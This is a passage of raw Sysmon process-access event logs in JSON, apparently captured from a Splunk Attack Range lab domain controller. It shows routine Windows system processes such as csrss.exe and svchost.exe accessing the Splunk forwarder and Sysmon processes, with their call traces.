Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4109,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:57.772\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-110D-5F25-0000-00105BF00500}\r\nTargetProcessId: 4128\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:57.772","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-110D-5F25-0000-00105BF00500}","TargetProcessId":"4128","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4110,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:57.772\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:57.772","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4111,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:57.772\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:57.772","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4112,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:57.772\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:57.772","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4113,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:57.772\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:57.772","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4114,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:57.772\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:57.772","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4115,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:57.772\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:57.772","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4116,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:57.772\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:57.772","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4117,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:57.772\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 